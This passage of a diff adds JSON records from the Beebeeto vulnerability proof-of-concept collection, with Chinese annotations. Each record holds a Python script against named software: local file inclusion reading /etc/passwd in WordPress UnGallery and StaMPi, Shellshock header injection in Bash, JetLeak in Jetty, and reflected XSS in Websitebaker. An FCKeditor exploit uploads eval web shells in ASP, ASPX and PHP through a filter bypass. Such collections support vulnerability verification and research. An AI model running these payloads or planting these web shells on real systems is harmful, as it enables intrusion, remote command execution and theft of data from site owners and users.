Player Plugin has file download in do/direct_download.php.", "app_name": "WordPress", "id": "poc-2015-0041", "layer4_protocol": null}
+{"create_date": "2015-03-02 15:07:11", "name": "WordPress UnGallery plugin <= 1.5.8 /source_vuln.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "WordPress UnGallery plugin\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b,source_vuln.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0040',\r\n            'name': 'WordPress UnGallery plugin <= 1.5.8 /source_vuln.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n            'author': 'Tiny',\r\n            'create_date': '2015-03-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['<=1.5.8'],\r\n            'type': 'Local File Inclusion',\r\n            'tag': ['WordPress UnGallery plugin\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b', 'source_vuln.php', 'php'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/wp-content/plugins/ungallery/source_vuln.php',\r\n            'references': ['http://www.exploit-db.com/exploits/17704/',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../etc/passwd%00'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'root:x:0:0:root:/root:/bin/bash' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/wp-content/plugins/ungallery/source_vuln.php", "app_name": "WordPress", "id": "poc-2015-0040", "layer4_protocol": null}
+{"create_date": "2015-02-26 14:04:17", "name": "Jetty Web Server 9.2.x-9.3.x \u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e [CVE-2015-2080] POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Jetty Web Server\u6f0f\u6d1e,CVE-2015-2080,\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport ssl\r\nimport sys\r\nimport urllib\r\nimport httplib\r\nimport urllib2\r\nimport string\r\nimport getopt\r\n\r\nfrom urlparse import urlparse\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0037',\r\n            'name': 'Jetty Web Server 9.2.x-9.3.x \u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e [CVE-2015-2080] POC',\r\n            'author': 'user1018',\r\n            'create_date': '2015-02-26',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Jetty Web Server',\r\n            'vul_version': ['9.2.8'],\r\n            'type': 'Other',\r\n            'tag': ['Jetty Web Server\u6f0f\u6d1e', 'CVE-2015-2080', '\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e'],\r\n            'desc': '''\r\n                    GDS\u5b89\u5168\u516c\u53f8\u53d1\u73b0\u4e86\u4e00\u4e2aJetty web server\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e\uff0c\r\n                    \u901a\u8fc7\u8be5\u6f0f\u6d1e\u4e00\u4e2a\u6ca1\u6709\u8ba4\u8bc1\u8fc7\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u524d\u5408\u6cd5\u7528\u6237\u5411\u670d\u52a1\u5668\u53d1\u9001\u7684\u8bf7\u6c42\u3002\r\n                    \u7b80\u800c\u8a00\u4e4b\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ece\u5b58\u5728\u6f0f\u6d1e\u7684\u670d\u52a1\u5668\u8fdc\u7a0b\u83b7\u53d6\u7f13\u5b58\u533a\u7684\u654f\u611f\u4fe1\u606f\uff0c\r\n                    \u5305\u62echttp\u5934\u7684\u4fe1\u606f\uff08cookies\u3001\u8ba4\u8bc1\u7684tokens\u3001\u9632\u6b62CSRF\u7684tokens\u7b49\u7b49\uff09\u4ee5\u53ca\u7528\u6237POST\u7684\u6570\u636e\uff08\u7528\u6237\u540d\u3001\u5bc6\u7801\u7b49\uff09\u3002\r\n\r\n                    \u6f0f\u6d1e\u7684\u6839\u6e90\u5728\u4e8e\u5f53header\u4e2d\u88ab\u63d2\u5165\u6076\u610f\u7684\u5b57\u7b26\u5e76\u63d0\u4ea4\u5230\u670d\u52a1\u5668\u540e\uff0c\u4f1a\u4ece\u5f02\u5e38\u5904\u7406\u4ee3\u7801\u4e2d\u83b7\u5f97\u5171\u4eab\u7f13\u51b2\u533a\u5927\u7ea616\r\n                    bytes\u7684\u6570\u636e\u3002\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u4e00\u4e2a\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u6765\u83b7\u53d6\u5f02\u5e38\u5e76\u504f\u79fb\u5230\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\uff0c\r\n                    \u5171\u4eab\u7f13\u51b2\u533a\u4e2d\u5b58\u7684\u662f\u7528\u6237\u5148\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0cJetty\u670d\u52a1\u5668\u4f1a\u6839\u636e\u7528\u6237\u63d0\u4ea4\u7684\u8bf7\u6c42\u8fd4\u56de\u5927\u7ea616\r\n                    bytes\u7684\u6570\u636e\u5757\uff0c\u8fd9\u91cc\u9762\u4f1a\u5305\u542b\u654f\u611f\u4fe1\u606f\u3002\r\n                    ''',\r\n            'references': [\r\n                    'http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html',\r\n                    'https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py'\r\n                    'http://bobao.360.cn/news/detail/1251.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    def _init_user_parser(self):\r\n        self.user_parser.add_option('-p','--port',\r\n                                    action='store', dest='port', type='string', default='80',\r\n                                    help='Use port. Default: 80')\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        '''\r\n        Github Author: Gotham Digital Science\r\n        Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether\r\n                 their Jetty web server versions are vulnerable to JetLeak. Currently, this script does\r\n                 not handle sites with invalid SSL certs. This will be fixed in a future iteration.\r\n        '''\r\n\r\n        conn = None\r\n        verify_url = urlparse(args['options']['target'])\r\n        port = args['options']['port']\r\n        fake_headers = ForgeHeaders().get_headers()\r\n\r\n        if verify_url.scheme == \"https\":\r\n            conn = httplib.HTTPSConnection(verify_url.netloc + \":\" + port)\r\n        elif verify_url.scheme == \"http\":\r\n            conn = httplib.HTTPConnection(verify_url.netloc + \":\" + port)\r\n        else:\r\n            args['poc_ret']['Error'] = \"Error: Only 'http' or 'https' URL Schemes Supported\"\r\n            return args\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Connect: %s ...' % verify_url.netloc\r\n\r\n        try:\r\n            x = '\\x00'\r\n            fake_headers['Referer'] = x\r\n            conn.request('POST', '/', '', fake_headers)\r\n            r1 = conn.getresponse()\r\n        except:\r\n            return args\r\n\r\n        if (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)):\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = '%s:%s' % (verify_url, port)\r\n            args['poc_ret']['headers'] = fake_headers\r\n            return args\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "GDS\u5b89\u5168\u516c\u53f8\u53d1\u73b0\u4e86\u4e00\u4e2aJetty web server\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e\uff0c\r\n\u901a\u8fc7\u8be5\u6f0f\u6d1e\u4e00\u4e2a\u6ca1\u6709\u8ba4\u8bc1\u8fc7\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u524d\u5408\u6cd5\u7528\u6237\u5411\u670d\u52a1\u5668\u53d1\u9001\u7684\u8bf7\u6c42\u3002\r\n\u7b80\u800c\u8a00\u4e4b\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ece\u5b58\u5728\u6f0f\u6d1e\u7684\u670d\u52a1\u5668\u8fdc\u7a0b\u83b7\u53d6\u7f13\u5b58\u533a\u7684\u654f\u611f\u4fe1\u606f\uff0c\r\n\u5305\u62echttp\u5934\u7684\u4fe1\u606f\uff08cookies\u3001\u8ba4\u8bc1\u7684tokens\u3001\u9632\u6b62CSRF\u7684tokens\u7b49\u7b49\uff09\u4ee5\u53ca\u7528\u6237POST\u7684\u6570\u636e\uff08\u7528\u6237\u540d\u3001\u5bc6\u7801\u7b49\uff09\u3002\r\n\r\n\u6f0f\u6d1e\u7684\u6839\u6e90\u5728\u4e8e\u5f53header\u4e2d\u88ab\u63d2\u5165\u6076\u610f\u7684\u5b57\u7b26\u5e76\u63d0\u4ea4\u5230\u670d\u52a1\u5668\u540e\uff0c\u4f1a\u4ece\u5f02\u5e38\u5904\u7406\u4ee3\u7801\u4e2d\u83b7\u5f97\u5171\u4eab\u7f13\u51b2\u533a\u5927\u7ea616\r\nbytes\u7684\u6570\u636e\u3002\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u4e00\u4e2a\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u6765\u83b7\u53d6\u5f02\u5e38\u5e76\u504f\u79fb\u5230\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\uff0c\r\n\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\u5b58\u7684\u662f\u7528\u6237\u5148\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0cJetty\u670d\u52a1\u5668\u4f1a\u6839\u636e\u7528\u6237\u63d0\u4ea4\u7684\u8bf7\u6c42\u8fd4\u56de\u5927\u7ea616\r\nbytes\u7684\u6570\u636e\u5757\uff0c\u8fd9\u91cc\u9762\u4f1a\u5305\u542b\u654f\u611f\u4fe1\u606f\u3002", "app_name": "Jetty Web Server", "id": "poc-2015-0037", "layer4_protocol": null}
+{"create_date": "2015-02-19 10:38:44", "name": "StaMPi /path/fotogalerie.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "StaMPi\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b,/path/fotogalerie.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0035',\r\n            'name': 'StaMPi /path/fotogalerie.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n            'author': 'Tiny',\r\n            'create_date': '2015-02-16',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'StaMPi',\r\n            'vul_version': ['*'],\r\n            'type': 'Local File Inclusion',\r\n            'tag': ['StaMPi\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b', '/path/fotogalerie.php', 'php'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/path/fotogalerie.php',\r\n            'references': ['http://www.exploit-db.com/exploits/36031/',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'root:x:0:0:root:/root:/bin/bash' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/path/fotogalerie.php", "app_name": "Other", "id": "poc-2015-0035", "layer4_protocol": null}
+{"create_date": "2015-02-15 17:20:25", "name": "GNU Bash <= 4.3 Shockshell \u7834\u58f3\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "Tommy", "rank": 3, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "bash\u6f0f\u6d1e,CVE-2014-6271,ShellShock\u7834\u58f3\u6f0f\u6d1e,cgi", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0032',\r\n            'name': 'GNU Bash <= 4.3 Shockshell \u7834\u58f3\u6f0f\u6d1e POC',\r\n            'author': 'Tommy',\r\n            'create_date': '2015-02-12',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'bash',\r\n            'vul_version': ['<=4.3'],\r\n            'type': 'Command Execution',\r\n            'tag': ['bash\u6f0f\u6d1e', 'CVE-2014-6271', 'ShellShock\u7834\u58f3\u6f0f\u6d1e', 'cgi'],\r\n            'desc': '\u6267\u884cshell\u547d\u4ee4\uff0c\u4ece\u800c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u6f0f\u3001\u672a\u6388\u6743\u7684\u6076\u610f\u4fee\u6539\u3001\u670d\u52a1\u4e2d\u65ad',\r\n            'references': [\r\n                'http://www.exploit-db.com/exploits/34765/',\r\n                'http://blog.knownsec.com/2014/09/shellshock_response_profile/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    '''\r\n    GNU Bash 4.3\u53ca\u4e4b\u524d\u7248\u672c\u5728\u8bc4\u4f30\u67d0\u4e9b\u6784\u9020\u7684\u73af\u5883\u53d8\u91cf\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\r\n    \u5411\u73af\u5883\u53d8\u91cf\u503c\u5185\u7684\u51fd\u6570\u5b9a\u4e49\u540e\u6dfb\u52a0\u591a\u4f59\u7684\u5b57\u7b26\u4e32\u4f1a\u89e6\u53d1\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6539\u53d8\u6216\u7ed5\u8fc7\u73af\u5883\u9650\u5236\uff0c\r\n    \u4ee5\u6267\u884cShell\u547d\u4ee4\u3002\u67d0\u4e9b\u670d\u52a1\u548c\u5e94\u7528\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u63d0\u4f9b\u73af\u5883\u53d8\u91cf\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002\r\n    \u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728\u8c03\u7528Bash Shell\u4e4b\u524d\u53ef\u4ee5\u7528\u6784\u9020\u7684\u503c\u521b\u5efa\u73af\u5883\u53d8\u91cf\u3002\r\n    \u8fd9\u4e9b\u53d8\u91cf\u53ef\u4ee5\u5305\u542b\u4ee3\u7801\uff0c\u5728Shell\u88ab\u8c03\u7528\u540e\u4f1a\u88ab\u7acb\u5373\u6267\u884c\u3002\r\n    '''\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n\tip =  args['options']['target']\r\n\topener = urllib2.build_opener()\r\n\t# Modify User-agent header value for Shell Shock test\r\n\topener.addheaders = [\r\n                ('User-agent', '() { :;}; echo Content-Type: text/plain ; echo \"1a8b8e54b53f63a8efae84e064373f19:\"'),\r\n\t\t\t\t('Accept','text/plain'),\r\n\t\t\t\t('Content-type','application/x-www-form-urlencoded'),\r\n\t\t\t\t('Referer','http://www.baidu.com')\r\n\t\t\t\t]\r\n\ttry:\r\n\t\tURL = ip\r\n\t\tresponse = opener.open(URL)\r\n\t\theaders = response.info()\r\n\t\tstatus = response.getcode()\r\n\t\topener.close()\r\n\t\tif status==200:\r\n\t\t\tif \"1a8b8e54b53f63a8efae84e064373f19\" in headers:\r\n\t\t\t\targs['success'] = True\r\n\t\t\t\targs['poc_ret']['vul_url'] = URL\r\n\t\t\telse:\r\n\t\t\t\targs['success'] = False\r\n\t\treturn args\r\n\t\t\r\n\texcept Exception as e:\r\n\t\topener.close()\r\n\t\targs['success'] = False\r\n\t\treturn args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6267\u884cshell\u547d\u4ee4\uff0c\u4ece\u800c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u6f0f\u3001\u672a\u6388\u6743\u7684\u6076\u610f\u4fee\u6539\u3001\u670d\u52a1\u4e2d\u65ad", "app_name": "bash", "id": "poc-2015-0032", "layer4_protocol": null}
+{"create_date": "2015-02-09 22:57:18", "name": "FCKeditor <= 2.4.3 /upload.asp File Upload POC & Exploit", "level": "\u4e2d\u5371", "batchable": 0, "author": "r0gent", "rank": 3, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "FCKeditor\u6f0f\u6d1e,FCK\u7f16\u8f91\u5668\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e,asp,php,aspx", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding:utf-8\r\n\r\n\r\nimport re\r\nimport socket\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc' : {\r\n            'id' : 'poc-2015-0031',\r\n            'name' : 'FCKeditor <= 2.4.3 /upload.asp File Upload POC & Exploit',\r\n            'author' : 'r0gent',\r\n            'create_date' : '2015-02-04',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol' : {\r\n            'name' : 'http',\r\n            'port' : [80],\r\n            'layer4_protocol' : ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul' : {\r\n            'app_name' : 'FCKeditor',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version' : ['<=2.4.3'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'File Upload',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['FCKeditor\u6f0f\u6d1e', 'FCK\u7f16\u8f91\u5668\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e', 'asp', 'php', 'aspx'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'fckeditor <= 2.4.3\u7248\u672c, upload.asp\u6587\u4ef6\u4e3a\u9ed1\u540d\u5355\u8fc7\u6ee4, \u53ef\u7ed5\u8fc7\u4e0a\u4f20',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        host = args['options']['target'] + args['options']['path']\r\n        version_number = cls.get_version(host)\r\n\r\n        if version_number <= '2.4.3':\r\n            args['success'] = True\r\n            args['poc_ret']['reason'] = '\u6b64\u7248\u672c\u4e3a' + str(version_number) + '\u7b26\u5408\u6f0f\u6d1e\u5229\u7528'\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        url = args['options']['target']\r\n        Path = args['options']['path']\r\n        host = url + Path\r\n        if url.startswith('http://'):\r\n            url_noheader = url[7:]\r\n\r\n        for script_type in ['asp', 'aspx', 'php']:\r\n            if script_type == 'asp':\r\n                shell_name = 'css3.cer'\r\n                shell_content = '<%eval request(\"Bee\")%>'\r\n                path = host + 'editor/filemanager/upload/asp/upload.asp'\r\n            elif script_type == 'aspx':\r\n                shell_name = 'css3.aspx '\r\n                shell_content = '<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Bee\"],\"unsafe\");%>'\r\n                path = host + 'editor/filemanager/upload/aspx/upload.aspx'\r\n            elif script_type == 'php':\r\n                shell_name = 'css3.php '\r\n                path = host + 'editor/filemanager/upload/php/upload.php'\r\n                shell_content = '<?php eval($_POST[Bee]) ?>'\r\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n            s.connect((url_noheader, 80))\r\n            s.settimeout(8)\r\n\r\n            payload = '-----------------------------20537215486483\\r\\n'\r\n            payload += 'Content-Disposition: form-data; name=\"NewFile\"; filename=\"%s\"\\r\\n' % (shell_name)\r\n            payload += 'Content-Type: image/jpeg\\r\\n\\r\\n'\r\n            payload += 'GIF89a\\r\\n'\r\n            payload +='%s\\r\\n\\r\\n\\r\\n' % (shell_content)\r\n            payload += '-----------------------------20537215486483--\\r\\n'\r\n            payload_length = len(payload)\r\n\r\n            packet = 'POST ' + path + ' HTTP/1.1\\r\\n'\r\n            packet += 'HOST: ' + url_noheader + '\\r\\n'\r\n            packet += 'Connection: Close\\r\\n'\r\n            packet += 'Content-Type: multipart/form-data; boundary=---------------------------20537215486483\\r\\n'\r\n            packet += 'Content-Length: %d' % payload_length+'\\r\\n'\r\n            packet += '\\r\\n'\r\n            packet = packet + payload\r\n\r\n            s.send(packet)\r\n            data = ''\r\n            while True:\r\n                buf = s.recv(1024)\r\n                if not buf:\r\n                    break\r\n                data += buf\r\n            s.close()\r\n            re_shellurl = re.compile('OnUploadCompleted\\(.+\\)')\r\n            shellurl = re_shellurl.findall(data)[0]\r\n            shellurl = re.findall('../(\\w.+?)\"', shellurl)\r\n            if len(shellurl) > 0:\r\n                break\r\n        if len(shellurl)>0:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = url + '/' + shellurl[0]\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            print '[-]Sorry i faild with Old version exp --- <<' + script_type + '>>'\r\n            return args\r\n\r\n    @classmethod\r\n    def get_version(cls, fck_url):\r\n        try:\r\n            url_dic = dict()\r\n            version_url = fck_url + '/editor/dialog/fck_about.html'\r\n            print version_url\r\n            version_resp = urllib2.urlopen(version_url).read()\r\n            re_version = re.compile('<b>(\\d\\.\\d[\\.\\d]*).{0,10}<\\/b>')\r\n            parr = re_version.findall(version_resp)\r\n            print '[+]The fck version is %s'%parr[0]\r\n            return parr[0]\r\n        except:\r\n            return '8.8.8'\r\n\r\n    def _init_user_parser(self):\r\n        self.user_parser.add_option('-p', '--path',\r\n                                    action = 'store', dest = 'path', default = None, help = 'please input the FCKEditor Path !')\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "fckeditor <= 2.4.3\u7248\u672c, upload.asp\u6587\u4ef6\u4e3a\u9ed1\u540d\u5355\u8fc7\u6ee4, \u53ef\u7ed5\u8fc7\u4e0a\u4f20", "app_name": "FCKeditor", "id": "poc-2015-0031", "layer4_protocol": null}
+{"create_date": "2015-02-04 11:57:39", "name": "Websitebaker CMS v2.8.3 Reflecting XSS vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u585e\u4e07\u94c1\u725b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Websitebaker CMS,XSS\u6f0f\u6d1e,modify.php?page_id=1,CVE-2015-0553", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0028',\r\n            'name': 'Websitebaker CMS v2.8.3 Reflecting XSS vulnerability POC',\r\n            'author': '\u585e\u4e07\u94c1\u725b',\r\n            'create_date': '2015-01-26',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Websitebaker CMS',\r\n            'vul_version': ['v2.8.3'],\r\n            'type': 'Cross-Site Scripting',\r\n            'tag': ['Websitebaker CMS', 'XSS\u6f0f\u6d1e', 'modify.php?page_id=1', 'CVE-2015-0553'],\r\n            'desc': '''\r\n                    \u9690\u85cf\u8868\u5355\u4e2d\u5f15\u53d1\u7684\u53cd\u5c04XSS\u6f0f\u6d1e\r\n                    ''',\r\n            'references': ['http://packetstormsecurity.com/files/130008/CMS-Websitebaker-2.8.3-SP3-Cross-Site-Scripting.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/admin/pages/modify.php?page_id=1%22><script>alert(%27XSS%27)</script><!--'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(\"XSS\")</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n        \r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u9690\u85cf\u8868\u5355\u4e2d\u5f15\u53d1\u7684\u53cd\u5c04XSS\u6f0f\u6d1e", "app_name": "Other", "id": "poc-2015-0028", "layer4_protocol": null}
